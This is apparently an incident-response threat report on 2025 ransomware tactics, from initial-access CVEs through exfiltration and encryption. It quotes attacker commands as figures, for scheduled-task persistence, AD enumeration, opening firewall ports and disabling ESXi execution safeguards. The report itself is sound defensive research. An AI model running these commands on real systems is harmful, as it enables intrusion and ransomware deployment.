In 2025, ransomware actors continued to evolve their operations by adopting emerging or established technologies to increase the efficiency and efficacy of their operations. Some threat actors are integrating Web3 technologies into their operations, likely as a way to make their infrastructure more resilient to takedown and detection efforts. The Cry0 RaaS claims to leverage Internet Computer Protocol (ICP) blockchain to host negotiation sites via decentralized canister smart contracts, enabling clearnet access without requiring TOR while DEADLOCK ransomware has leveraged Polygon smart contracts in order to store and rotate C2 infrastructure. We have also seen threat actors incorporating AI-features into their RaaS offerings: the GLOBAL RaaS reportedly has an AI-assisted chat that provides victim analysis and assists with communications, CHAOS purportedly includes a "built-in AI chatbot," although its specific use is unclear, while BERT allegedly uses AI-based data analysis to identify victim pressure points. Finally, we have observed twice the number of ransomware families that were capable of running on both Windows and Linux systems compared to 2024. This could suggest that threat actors are shifting toward cross-platform ransomware rather than creating multiple, separate variants to support their operations.

Commonly Observed Tactics, Techniques, and Procedures

The following sections discuss trends in the TTPs observed in post-compromise ransomware deployment incidents, organized into the corresponding stages of GTIG's attack lifecycle model (Figure 5). The TTPs outlined in this section were observed at Mandiant-led ransomware investigations during 2025.

Attack lifecycle associated with 2025 ransomware incidents

Figure 5: Attack lifecycle associated with 2025 ransomware incidents

Initial Access

During 2025, the most commonly identified initial access vector in ransomware incidents was the exploitation or suspected exploitation of vulnerabilities, accounting for a third of incidents, followed by web compromise, stolen credentials, and bruteforce attacks (Figure 6). Notably, while voice phishing was a commonly leveraged tactic in several high profile data theft extortion campaigns, it was not observed in ransomware incidents. This year we included suspected initial access vectors in our analysis to provide a more holistic view, given that some vectors can be more difficult to verify. For example, it can be difficult to confirm the use of stolen credentials, given that the credentials may have been harvested in a separate incident that occurred weeks prior or even on a personal device. Conversely, bruteforce attacks tend to generate many log entries that can be used to confirm the vector.

  • Throughout 2025 we observed ransomware operators leveraging a wide range of exploits for initial access (Table 1). While the majority of observed or suspected exploitation activity involved vulnerabilities disclosed prior to 2025, we observed multiple indicators that at least some ransomware actors were leveraging zero-day exploits in their operations.

    • In the majority of instances where exploits were used or suspected, the threat actors targeted vulnerabilities in common VPNs and firewalls such as Fortinet (CVE-2024-55591, CVE-2024-21762, and CVE-2019-6693), SonicWall (CVE-2024-40766), Palo Alto (CVE-2024-3400), and Citrix (CVE-2023-4966).

    • We also observed malicious actors successfully exploit a variety of other exposed services, including Veritas Backup Exec, Zoho ManageEngine, Microsoft Sharepoint, and SAP Netweaver.

    • We observed evidence that multiple ransomware and/or data theft extortion operations leveraged zero-day vulnerabilities for initial access throughout the year.

      • During mid-July 2025, an UNC6357 actor attempted to exploit Microsoft Sharepoint vulnerabilities CVE-2025-53770 and CVE-2025-53771 to gain access to the victim's environment and ultimately deploy LOCKBIT.WARLOCK. While this was observed after disclosure of the vulnerability, we observed evidence—including log data and public reporting—suggesting the same actor attempted to exploit the same vulnerability as a zero-day.

      • In August 2025, GTIG assessed with high confidence that UNC2165 leveraged a zero-day exploit for CVE-2025-8088 to deploy MYTHICAGENT.

      • While the observed incidents did not involve ransomware deployment, threat actors associated with the CL0P DLS may have exploited CVE-2025-61882 as a zero-day against Oracle EBS environments. The CL0P DLS has been associated with multifaceted extortion operations involving CLOP ransomware; however, it is primarily associated with data theft extortion operations rather than ransomware deployment.

  • We observed multiple threat clusters leverage malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads for initial access, including both ransomware operators themselves and initial access partners that ultimately led to follow-on ransomware intrusions. 

    • We observed multiple UNC6016 malware distribution operations leverage malvertising to distribute malware payloads masquerading as legitimate software tools such as PuTTY to gain initial access. At least a portion of observed UNC6016 access operations ultimately lead to NITROGEN or RHYSIDA ransomware deployments.

    • UNC2465 routinely leveraged malvertising and/or SEO techniques to distribute SMOKEDHAM payloads masquerading as RVTOOLs installers.

  • While less frequent this year, many threat actors continued to rely on stolen credentials for initial access. In 21% of intrusions where the initial access vector was identified, the threat actor leveraged compromised legitimate credentials to access the victim environment, typically involving authentication to a victim's VPN or a Remote Desktop Protocol (RDP) login. While the source of stolen credentials cannot always be determined, actors can obtain them via numerous techniques including purchasing credentials from underground forums or using credentials exposed in infostealer logs.

  • We continued to see a subset of actors leveraging bruteforce attacks against victims' VPNs. In one incident involving ransomware that identified itself as Daixin, the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year before successfully gaining initial access.

  • We observed multiple intrusions where the ransomware operator gained access to the victim through an intermediary network. 

    • We observed multiple disparate ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network. In one instance the threat actor leveraged access to the subsidiary to bruteforce access to the victim's VPN.

    • In a separate incident, the threat actor leveraged a VPN connection owned by a third-party vendor to access an operational technology (OT) system within the victim's environment.

  • During one intrusion leading to CLOP ransomware deployment, UNC5833 gained access from an initial access partner who impersonated a helpdesk user to social engineer an employee via a Microsoft Teams chat session to install Quick Assist. While we observed limited use of social engineering by ransomware operators during 2025 in incidents we observed, it remained a popular technique among financially motivated intrusion actors more broadly.

Initial intrusion vectors

Figure 6: Initial intrusion vectors

Vendor

Product

CVE

Fortinet

FortiOS / FortiProxy

CVE-2024-21762

Veritas

Backup Exec

CVE-2021-27877

Veritas

Backup Exec

CVE-2021-27878

Zoho

ManageEngine ADSelfService Plus

CVE-2021-40539

Fortinet

FortiOS / FortiProxy

CVE-2024-55591

Fortinet

FortiOS

CVE-2019-6693

SonicWall

SonicOS

CVE-2024-40766

Citrix

NetScaler

CVE-2023-4966

Microsoft

SharePoint

CVE-2025-53771

Microsoft

SharePoint

CVE-2025-53770

SAP

Netweaver

CVE-2025-31324

Palo Alto

PAN-OS GlobalProtect

CVE-2024-3400

CrushFTP

CrushFTP

CVE-2025-31161

Table 1: Vulnerabilities likely leveraged for initial access in 2025 ransomware incidents

Establish Foothold and Maintain Presence

Once inside victim environments, threat actors engaged in many different techniques to establish a foothold and maintain presence, including leveraging valid credentials, tunnelers, backdoors, or legitimate remote access tools. Threat actors continued to use remote management tools to support both these phases of the attack lifecycle, albeit at slightly lower rates than 2024.

  • Ransomware actors consistently relied on compromised credentials to establish a foothold in victim environments. 

    • Once authenticated to network services, they also often used these credentials to provision or modify highly privileged accounts to maintain access. For example, in a RIFTTEAR incident, the threat actor authenticated via Kerberos to a privileged system, provisioned an AD domain user, and added the account to a high-privileged group. We also saw multiple threat actors change passwords to root accounts on ESXi hosts.

  • In 2025, an increased number of threat actors adopted tunnelers to support these phases compared to 2024 observations. Observed tunnelers included publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT.

    • In a LOCKBIT.WARLOCK incident, the exploitation of a Microsoft SharePoint vulnerability enabled remote code execution, granting the access required to install CLOUDFLARED from Github via the Windows msiexec command-line utility, establishing an outbound-only C2 channel.

  • A subset of threat actors deployed backdoors—including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM—to establish a foothold.

    • UNC6021, a suspected FIN6 threat cluster, used SQUIDGATE's built-in functionality to deploy FIREHAWK, a toehold backdoor written in C. Consistent with FIN6 infections, a social engineering engagement on LinkedIn prompted a user to access a malicious website hosting a ZIP archive containing the BULLZLINK downloader. Once executed, it retrieved a dropper variant of SQUIDSLEEP with an embedded SQUIDGATE payload.

  • In 2025, multiple ransomware actors relied on remote monitoring and management tools (RMMs) for multiple phases of the attack lifecycle. We observed a variety of these legitimate tools abused in incidents, including ANYDESK, SCREENCONNECT, and SPLASHTOP (Table 2). 

    • In an UNC2465 incident, several weeks after the initial intrusion, the threat actors installed the TERAMIND RMM alongside Time Doctor. Time Doctor is an employee monitoring tool, which is capable of taking screenshots and screen recordings of the system as well as track website and application usage.

  • Threat actors continued to reduce their reliance on BEACON in ransomware operations; we observed BEACON in around 2% of intrusions, a decrease from an already diminished 11% in 2024. However, multiple threat clusters used other post-exploitation frameworks like AdaptixC2 (ADAPTAGENT), Exploration C2 (EXPLORATIONC2), or MYTHIC.

    • In an UNC2165 RANSOMHUB incident, the threat actors used COM hijacking as a persistence mechanism for MYTHIC. UNC2165 created MYTHIC in the "Temp" folder, renamed it to "msedge.dll," and modified the registry key for InprocServer32 to point to the MYTHIC payload.

  • Threat actors often used native Windows features to create services and register scheduled tasks to programmatically and recurrently execute malware, such as backdoors or tunnelers. For example, in a RHYSIDA incident, threat actors registered a scheduled task to run the LIONSHARE tunneler every 12 hours (Figure 7).

  • In a TridentLocker-branded incident, the threat actors uploaded WAVECALL, a downloader implemented as a .NET assembly, to a victim server running CrushFTP. They modified the command-line instruction used for processing file previews, replacing the configured executable paths for ImageMagick and ExifTool utilities with the WAVECALL assembly, thereby executing it whenever a file preview operation was initiated. The actors later reverted this configuration and updated the command-line instruction to execute a Base64-encoded PowerShell script to deploy a follow-on payload.

/Create /SC MINUTE /MO 720 /TN Reg /TR "C:\Windows\System32\rundll32.exe C:\windows\system32\config\red.dll Test" /ru system

Figure 7: Scheduled task for LIONSHARE

ANYDESK

ATERA

CHROMEREMOTEDESKTOP

DAMEWARE

DWAGENT

MESHAGENT

RUSTDESK

SCREENCONNECT

SPLASHTOP

TERAMIND

   
Table 2: Legitimate remote access tools used to establish a foothold and maintain a presence

Escalate Privileges

Gaining access to highly privileged accounts is a critical step for ransomware actors as it enables further stages of the attack, such as disabling AV software, deleting backups, and deploying ransomware across the network. Threat actors continue to rely on a variety of privilege escalation tools and techniques, including leveraging MIMIKATZ, dumping credentials stored by the Windows operating system, and abusing Active Directory (AD).

  • We observed threat actors leverage MIMIKATZ in approximately 18% of ransomware intrusions in 2025, demonstrating a slight, but continued decline in its overall use in recent years dropping from use in 20% of all ransomware intrusions in 2024. Notably, we observed a decline in other publicly available privilege escalation and credential stealing tools as well; for example, we did not observe LAZAGNE in any ransomware intrusions in 2025, a reduction from 2% of intrusions in 2024, 4% in 2023, and 6% in 2022.

  • Consistent with recent years, throughout 2025 threat actors used a myriad of techniques to target Windows authentication systems to gain access to privileged accounts.

    • We observed threat actors frequently attempting to obtain credentials stored by Windows systems by dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the Security Account Manager (SAM), SYSTEM, and SECURITY registry hives.

    • Other observed methods include Kerberoasting, modifying the registry to enable WDigest credentials caching, and the recovery of credentials via the Windows Data Protection API (DPAPI).

    • Threat actors routinely elevated privileges of compromised and actor-provisioned accounts by adding them to local and domain administrator groups and/or granting the accounts additional privileges such as SeRemoteInteractiveLogonRight, SeDebugPrivilege, SeLoadDriverPrivilege, and SeBackupPrivilege.

    • In some intrusions, threat actors abused AD roles to obtain elevated privileges through a variety of means, including DCSync replication and the misuse of AD Certificate Services (AD CS). In a MEDUSALOCKER.V2 incident, the threat actors executed the "Move-ADDirectoryServerOperationMasterRole" cmdlet to transfer Flexible Single Master Operation (FSMO) roles from the victim's AD domain controller to a suspected rogue domain controller.

  • We observed multiple threat actors attempt to harvest credentials from various internal sources, including backup tools, browsers, password managers, and credentials stored in cleartext.

    • In approximately 10% of intrusions we observed threat actors targeting Veeam Backup & Replication for credential harvesting, which is consistent with activity observed in 2024. Multiple threat actors used the publicly available Veeam-Get-Creds.ps1 script or custom PowerShell scripts to obtain credentials stored in the Veeam configuration database.

    • In a handful of incidents, threat actors targeted Chromium-based browsers to obtain stored credentials. For example, in an UNC2165 RANSOMHUB incident, the threat actors executed inline PowerShell to retrieve and decrypt DPAPI-protected master encryption key from the Local State files of Google Chrome and Microsoft Edge allowing access to stored credentials within the browsers.

    • Threat actors accessed or attempted to access common password management tools, including KeePass, Bitwarden, and the Windows Credential Manager. During one UNC2465 intrusion involving AGENDA ransomware, the threat actor accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database.

    • During a REDBIKE ransomware incident, the threat actor likely harvested a cleartext password from a SonicWall appliance, which was also shared with an admin account, granting the actor domain administrator privileges.

  • During one ransomware incident targeting a victim's virtualized environment, the threat actor exploited CVE-2024-37085 to gain administrator access to an ESXi hypervisor.

Internal Reconnaissance

In 2025, the tactics leveraged for internal reconnaissance remained fairly consistent with recent years; threat actors continued to rely on native system utilities, PowerShell commands, and publicly available software.

  • Threat actors consistently used PowerShell to query Active Directory (AD) objects for running processes, network shares, and user group memberships. This activity ranged from using native cmdlets like Get-ADComputer and Get-ADUser to using script blocks to query other system data.

    • In several cases, threat actors used Get-ADComputer and Get-ADUser to export lists of AD objects to a separate file. For example, in an incident involving MEDUSALOCKER.V2, the threat actors queried specific user object properties, exported account identity, contact information, and organizational metadata (Figure 8). At the same incident, the threat actors executed a different command to query domain-joined computers, capturing properties such as the operating system (OS), IPv4 address, and last logon date (Figure 9).

    • In some instances, threat actors executed PowerShell script blocks that ran a multitude of commands at once. For example, in an INTERLOCK incident, the threat actors ran a condensed one-line script that performed user profiling—including identifying the current user's username, Security Identifier (SID), and group memberships—checked for a domain connection, and enumerated the Domain Admins group. Notably, the script included a jitter, or time delay, to create random pauses between command execution, likely in an attempt to evade detection against rapid-fire command execution.

  • Threat actors continued to rely heavily on internal Windows utilities in this phase of the attack lifecycle, including ipconfig, netstat, ping, and nltest, among others.

  • Publicly available reconnaissance utilities were used in numerous intrusions. These publicly available tools ranged from those specialized in probing networks, such as Advanced IP Scanner, Softperfect Network Scanner (NETSCAN), and Angry IP Scanner, to red-teaming tools like PowerSploit and IMPACKET. Notably, network reconnaissance utilities like Advanced IP Scanner, NETSCAN, and Angry IP Scanner were used in approximately 50% of intrusions, similar to their observed usage in 2023 and 2024.

  • We often saw threat actors accessing files and folders related to potentially sensitive information. In some cases, they appeared to search for backup scripts and password managers, while in other cases they were likely attempting to find sensitive files to exfiltrate in order to increase the pressure applied by data theft extortion.

    • In a REDBIKE intrusion, the threat actors searched for keywords like "passport," "i9," and "cyber insurance." In addition to searching for personally identifiable information (PII) like passports and employment eligibility forms, it is plausible that the threat actors were also seeking to obtain the victim's cyber insurance policies to help them determine a negotiation strategy or maximum ransom amount to demand.

  • Several threat actors performed targeted internal reconnaissance for information about virtualized infrastructure within the victim environment, likely to facilitate ransomware deployment on these systems. In a REDBIKE incident, threat actors enumerated hypervisors by running the Get-VM cmdlet and accessed the internal VMware vSphere web portal.

powershell Import-Module ActiveDirectory; Get-ADUser -filter * -properties Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | select Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | export-csv C:\Users\Public\Music\users.csv 

Figure 8: Get-ADUser HostCmd

powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\users\public\music\AllWindows.csv -NoTypeInformation -Encoding UTF8

Figure 9: Get-ADComputer HostCmd

Lateral Movement

Throughout 2025, actors extensively used common built-in protocols, including RDP, Server Message Block (SMB), and Secure Shell (SSH), combined with compromised credentials or attacker-created accounts for lateral movement. We also observed actors leveraging a variety of tools and utilities to tunnel and proxy traffic within victim environments.

  • In approximately 85% of intrusions, threat actors leveraged RDP with either compromised or attacker-created accounts for lateral movement.

  • Across a range of incidents we observed threat actors leveraging SMB for lateral movement to access network shares, stage payloads, and execute remote commands.

    • During one SAFEPAY ransomware incident, the threat actor leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts.

    • We also observed multiple actors leverage IMPACKET.SMBEXEC to execute remote commands. For example, in one intrusion leading to MEDUSALOCKER.V2 ransomware, the threat actor leveraged IMPACKET.SMBEXEC to run commands to create a new local administrator account on a remote host.

  • Across numerous incidents we observed various threat actors leverage common public utilities like PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems.

  • We continued to observe frequent use of common Windows utilities like PsExec, Windows Remote Management (WinRM), and to a lesser extent Windows Management Instrumentation Command-line (WMIC), for remote execution and lateral movement.

    • In a handful of intrusions, threat actors used PowerShell to establish interactive remote sessions via WinRM using the "Enter-PSSession" cmdlet.

    • In an UNC5774 INTERLOCK ransomware incident, the threat actors used WinRM to establish a connection to a domain controller and execute remote commands, including using net.exe to reset the password of a user account.

    • During an UNC2465 incident, the threat actor moved laterally by using WMIC to execute a SMOKEDHAM payload on a remote host.

  • In numerous incidents, threat actors manipulated firewall rules in order to enable different types of traffic, such as RDP or SMB, to be allowed within the victim environment.

    • In one incident, UNC6021, a suspected FIN6 threat cluster, created a scheduled task that ran a netsh command to modify firewall rules to enable remote desktop access (Figure 10).

    • During one UNC6276 intrusion, the threat actor disabled the firewall on an ESXi host before deploying SYSTEMBC.LINUX on the host.

    • In one incident the threat actor installed OpenSSH on a host and ran a PowerShell command to configure a new firewall rule to allow inbound traffic on port 22 (Figure 11).

    • In an intrusion leading to the deployment of INC ransomware, the threat actor leveraged an attacker-created account to create new firewall policies that granted access to multiple additional subnets within the network.

  • Threat actors leveraged a variety of malicious and legitimate utilities to tunnel and proxy traffic within victim networks, including SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH. During one LOCKBIT.WARLOCK intrusions the threat actor leveraged CLOUDFLARED to tunnel an RDP connection between two hosts.

  • In a minimal number of incidents, threat actors leveraged publicly available post-exploitation tools including METASPLOIT and AMNESIAC.

  • Threat actors often abused access to various management consoles for virtual systems to move laterally to virtual hosts. 

    • In multiple instances, the threat actors appeared to leverage this access to enable SSH on ESXi hosts prior to establishing SSH connections for lateral movement. For example, in a FOULFOG.LINUX incident, threat actors leveraged access from the victim's VMware vSphere centralized management portal to enable SSH on a vm-host, created user root1, SSHed using the newly created user, and disabled firewall.

    • During one incident the threat actor leveraged access to the victim's Nutanix Prism Central management tool along with a compromised account to move laterally to multiple additional systems. In the same incident, the threat actor also used the VMware web user interface to access numerous ESXi hosts.

  • In a subset of intrusions we observed evidence of threat actors conducting bruteforce attacks to gain access to accounts on additional systems.

cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=No

Figure 10: netsh command to modify firewall rules to enable remote access

powershell.exe -Command New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22

Figure 11: PowerShell command to allow inbound SSH traffic

Complete Mission

The following sections highlight observations from the complete mission phase of the attack lifecycle, covering ransomware deployment, data exfiltration, and anti-analysis and recovery techniques. Threat actors conducting ransomware attacks routinely conduct multifaceted extortion operations involving data theft as it provides additional leverage during negotiations. Threat actors also consistently engage in a diverse range of tactics to ensure the success of their operations and reduce the ability for victims to recover, including tampering with security software, deleting backups, and clearing logs. Notable trends in 2025 include the prevalence of REDBIKE ransomware, an increase in the percentage of incidents involving data theft extortion, and indications that the techniques used to target virtual systems may be maturing.

Ransomware Families

REDBIKE was the most prominent ransomware observed in 2025 Mandiant incident response investigations, followed by AGENDA and then INC ransomware (Figure 12). In 2024, REDBIKE was tied for the number one spot with LOCKBIT.BLACK and RANSOMHUB; however, in 2024 LOCKBIT experienced significant disruptive actions stemming from law enforcement actions and in 2025 RansomHub abruptly ceased operations. Throughout 2025 we also observed a handful of incidents involving newly identified ransomware, such as NINTHBEE and SILVERPINE, demonstrating that at least a subset of threat actors are developing and maintaining new ransomware families.

  • REDBIKE was seen in almost 30% of 2025 ransomware incidents, surpassing previous highs for single ransomware families, including LOCKBIT and ALPHV reaching 17% each in 2023.

  • We continue to observe threat actors reusing existing ransomware families in seemingly unrelated operations conducted under different extortion brands.

    • While we have seen a significant decrease in LOCKBIT ransomware incidents since the legal actions taken against the RaaS in 2024, in 2025 we did observe a handful of LOCKBIT.WARLOCK incidents. The WarLock DLS emerged in July 2025 and has listed over 75 victims since. LOCKBIT.WARLOCK largely leverages the original LOCKBIT codebase; however, it uses different encryption algorithms, and refactors previously inlined operations into dedicated functions.

    • In 2025, we observed a handful of intrusions involving CONTI ransomware, though the CONTI RaaS was shut down in May 2022 following the leak of associated chat logs and the CONTI source code. For example, we observed CONTI deployed in a 2025 incident associated with the Gunra ransomware group; analysis of the ransomware payload identified it was heavily based on CONTI's source code, with slight variations in obfuscation.

  • We observed three different extortion brands leveraging INC ransomware in their operations: INC Ransom, Sinobi, and Lynx. The INC ransomware source code was advertised in an underground forum in May 2024 but the Lynx and INC Ransom DLS domains were acquired by a common threat actor.

  • GTIG observed ODDSIDE ransomware in an incident in 2025; ODDSIDE is PowerShell-based ransomware that refers to itself as DARKMATTER. While not completely unheard of, PowerShell-based ransomware is fairly rare.

  • Notably, in one incident we observed threat actors deploy CLOP ransomware. This is the first time we’ve responded to a CLOP ransomware incident since 2020, though we have occasionally identified CLOP ransomware samples uploaded to malware repositories. In recent years, threat actors associated with the CL0P data leak site have primarily conducted data-theft-extortion-only operations rather than performing encryption.

  • In a subset of incidents, we were unable to obtain the ransomware payloads. For example, we observed a handful of TridentLocker-branded ransomware incidents in which there is evidence to suggest that the ransomware payload was executed in memory. It's plausible the threat actors used in-memory execution to deploy ransomware to try and bypass security detections and potentially make analysis and recovery efforts more difficult.

  • Threat actors occasionally abuse legitimate encryption tools in their extortion operations. In 2025, we observed an incident in which threat actors used BitLocker to encrypt over 200 remote hosts.

Distribution of ransomware families observed in 2025 investigations

Figure 12: Distribution of ransomware families observed in 2025 investigations

Ransomware Families Observed in 2025 Mandiant Investigations

AGENDA

AGENDA.ESXI

AGENDA.RUST

BABUK

BABUK.MARIO

CLOP

CONTI

CRYTOX

DOLLARLOCKER

FOULFOG.LINUX

INC

INC.LINUX

INTERLOCK

LOCKBIT.UNIX

LOCKBIT.WARLOCK

MEDUSALOCKER.V2

NINTHBEE

NITROGEN

ODDSIDE

PLAYCRYPT

RANSOMHUB

REDBIKE

RHYSIDA

RIFTTEAR

SAFEPAY

SILVERPINE

WHITERABBIT

   
Table 3: Ransomware families observed in Mandiant's 2025 incident response investigations

Data Exfiltration

In 2025, we observed confirmed or suspected data theft in approximately 77% of ransomware intrusions, a notable increase from approximately 57% in 2024. In these incidents, the most frequently observed strategies for identifying, staging, and exfiltrating data included the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, and FTP clients such as Filezilla or Winscp.

  • During intrusions where data was stolen, we routinely observed threat actors targeting a variety of sensitive data types, including legal, human resources, accounting, and business development data.

    • We observed evidence of threat actors conducting manual reconnaissance of systems likely to gather sensitive data for exfiltration such as accessing emails and attempting to access SharePoint and other Microsoft 365 environments via the browser.

  • In 2025, threat actors continued to rely on publicly available tools and utilities—including Rclone, MEGASync, Megatools, restic, and possibly Cyberduck—to exfiltrate data.

    • We observed Rclone in approximately 28% of intrusions where data theft was confirmed or suspected to exfiltrate data to attacker-controlled infrastructure.

    • In one INC ransomware incident, the threat actor used the wget and curl commands to download Rclone and an INC.LINUX ransomware payload respectively to a network-attached storage (NAS) server. The threat actor subsequently ran Rclone to exfiltrate data from the server prior to manually executing the INC.LINUX payload.

    • Threat actors installed and/or leveraged legitimate FTP/SFTP clients in 26% of intrusions where data theft was observed or suspected. Commonly observed software included FileZilla, WinSCP, and PuTTY Secure Copy.

    • While not confirmed to be used for data exfiltration, we observed threat actors installing and/or executing various utilities that could be used to aid in the reconnaissance, staging, and export of stolen data such as Total Commander, Xcopy, and Gpg4win.

  • Threat actors leveraged a myriad of legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.

    • In one UNC5471 intrusion leading to AGENDA ransomware, the threat actor leveraged batch scripts alongside WinRAR to automate the archiving of files in directories. The actor then used Megatools and SLEETSEND to exfiltrate the data to the MEGA and Cloudzy cloud storage services.

    • We observed multiple threat actors transferring stolen data to attacker-controlled OneDrive accounts. During one UNC5496 intrusion, the threat actor ran commands to have Rclone transfer all files that matched a list of common file extension types to a threat actor-controlled OneDrive account.

    • In multiple incidents, we observed threat actors leveraging AzCopy to transfer stolen files to attacker-controlled Azure storage.

  • During one UNC6098 intrusion, the threat actor leveraged the SQL Server Import and Export Wizard to export a SQL database.

Ransomware Deployment

We observed a diverse set of ransomware deployment techniques leveraged in intrusions throughout 2025. Threat actors employed both manual and automated deployment techniques, including the use of batch scripts, scheduled tasks, Group Policy Objects (GPOs), registry keys, and PowerShell scripts. Notably, in almost 20% of incidents, threat actors targeted virtualization infrastructure, and we observed multiple incidents where operators automated portions of their ransomware deployment against ESXi hosts, suggesting techniques used to target virtual systems may be maturing.

  • Threat actors often relied on automated mechanisms to deploy ransomware. In many cases, they relied on native Windows mechanisms to facilitate ransomware execution.

    • Multiple threat clusters leveraged batch scripts to facilitate ransomware payload execution in victim environments. In one LOCKBIT.WARLOCK intrusion, the threat actor staged NetExec on a domain controller along with files to run the ransomware payload. The threat actor then used NetExec to copy a batch file to numerous hosts via SMB and run it to execute the ransomware payload.

    • In a separate LOCKBIT.WARLOCK intrusion, the threat actor staged ransomware payloads on multiple hosts via SMB before executing them via scheduled tasks.

    • During a NINTHBEE ransomware incident, the threat actor modified a GPO to include a malicious scheduled task that disabled Windows Defender and subsequently executed the ransomware payload. In the same intrusion, the threat actor also attempted to execute the NINTHBEE payload on multiple remote hosts via PsExec.

    • In an incident likely involving DOLLARLOCKER, a threat actor created a Windows service to run a command to execute the ransomware payload.

    • Multiple threat clusters leveraged the Windows Registry to complete their ransomware deployment objectives. During an UNC5471 intrusion, the threat actor created registry Run keys to execute AGENDA ransomware on multiple servers persistently. In one INTERLOCK ransomware intrusion, following encryption, the threat actor modified the LegalNoticeCaption and LegalNoticeText registry values to display a banner indicating the system was ransomed on start up.

  • In addition to using SMB to stage ransomware payloads, we also observed threat actors leverage SMB to facilitate more expansive ransomware deployment across victim networks. In one incident, actors identified network shares via the "Invoke-ShareFinder" PowerShell cmdlet and likely supplied this list to REDBIKE as a list of targets. Ultimately, encryption was attempted on more than 500 endpoints via SMB.

  • In a small subset of observed intrusions, threat actors leverage PowerShell to automate the deployment of BitLocker encryption across victims' environments. During one intrusion, the threat actor used a PowerShell script to install, configure, and assign passwords for BitLocker on multiple hosts. The threat actor then enabled encryption on multiple drives on these hosts and scheduled a system restart to force the hosts into a locked state. The actor also modified the registry to display a ransom note on the BitLocker preboot recovery screen.

  • In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024. While ransomware deployment to virtual systems is often done manually, in 2025 we observed at least some incidents where threat actors attempted to automate portions of the ransomware deployment stage.

    • During an UNC5495 intrusion, the threat actor automated the deployment of BABUK.MARIO by leveraging a batch script that accepted credentials for ESXi hosts. The batch script used a staged copy of KiTTY to copy the ransomware payload to the host and then connect via SSH and run a command to execute the payload on each host. In a separate intrusion, a threat actor leveraged a PowerShell script to authenticate to the victim's vCenter server, set new root passwords, and enable SSH on ESXi hosts. The same script was used to subsequently copy a RIFTEAR ransomware payload to the hosts, delete backups, shutdown virtual machines (VMs), and disable security policies prior to executing the ransomware payload.

  • Prior to ransomware deployment on ESXi hosts, threat actors commonly disabled the ExecInstalledOnly setting on hosts to allow for the execution of custom binaries (Figure 13). During one intrusion, the threat actor also accessed a vCenter server and modified the Lockdown Mode Exception Users settings, which controls users that are allowed to maintain privileges when the host is in lockdown mode.

  • Across multiple intrusions, threat actors took steps to stop virtual machines and unlock files prior to decryption, almost certainly to maximize the impact of their ransomware payloads.

    • In multiple instances threat actors used or attempted to use IOBIT, a legitimate uninstaller utility, to unlock files in use by other programs prior to executing ransomware payloads.

    • We also observed multiple actors shutting down virtual machines and deleting backups and snapshots prior to encryption. In at least one intrusion, an actor leveraged a PowerShell script to automate the process of powering off virtual machines.

    • During one intrusion, the threat actor accessed the victim's Commvault server and deleted vCenter backup volumes prior to encryption to hinder recovery.

  • During a TridentLocker-branded ransomware incident, we assess with moderate confidence that the threat actor leveraged the same CrushFTP preview hijacking technique used for WAVECALL persistence to download and execute a ransomware payload from the WAVECALL C2 server.

esxcli system settings advanced set -o /User/execInstalledOnly -i 0

Figure 13: Command to disable ExecInstalledOnly setting on ESXi hosts

Anti-Detection, Analysis, and Recovery Tactics

Ransomware actors consistently engage in anti-detection, anti-analysis, and anti-recovery tactics in their operations in an effort to not only prevent detection during the intrusion, but increase the difficulty for victims to recover post-encryption. While these tactics are often manually performed by threat actors, numerous ransomware families feature built-in capabilities to hinder analysis and delete backups prior to encryption.

  • Threat actors consistently disabled and tampered with security controls during ransomware intrusions to avoid detection and/or block of execution of malicious payloads. Most commonly, we observed threat actors disabling Windows Defender, often by modifying the Windows registry. In some other cases, the threat actors modified Defender configurations via the Set-MpPreference PowerShell cmdlet to add exclusions for their malware and ransomware payloads. Threat actors also were observed leveraging GPOs, scheduled tasks, and PowerShell scripts in order to tamper with a variety of security controls.

    • In a REDBIKE incident, threat actors used PowerShell to disable a multitude of Windows Defender features by running commands to modify a variety of values associated with Windows Defender registry keys, including DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, and DisableOnAccessProtection (Figure 14).

    • In an intrusion involving WHITERABBIT, threat actors executed a Base64-encoded PowerShell command that used the "Add-MpPreference" cmdlet to modify the Defender Exclusion list to include the ransomware binary; a variety of file extensions, such as ".cmd," ".bat," and ".exe"; as well as User Data folders.

    • In an incident involving NINTHBEE, threat actors registered a scheduled task to execute daily a command that disables Microsoft Defender's real-time scanning for downloaded files and email attachments.

  • Ransomware actors often deleted artifacts and cleared event logs to remove evidence of their activity. These records included information about command execution, firewall traffic, and stolen credentials. The wevtutil utility was used to facilitate log deletion in multiple instances.

    • In a FOULFOG.LINUX incident, the threat actors renamed the ransomware binary to a less suspicious name, "filerw"; deleted the command history for the system; and created an empty file to replace the deleted file.

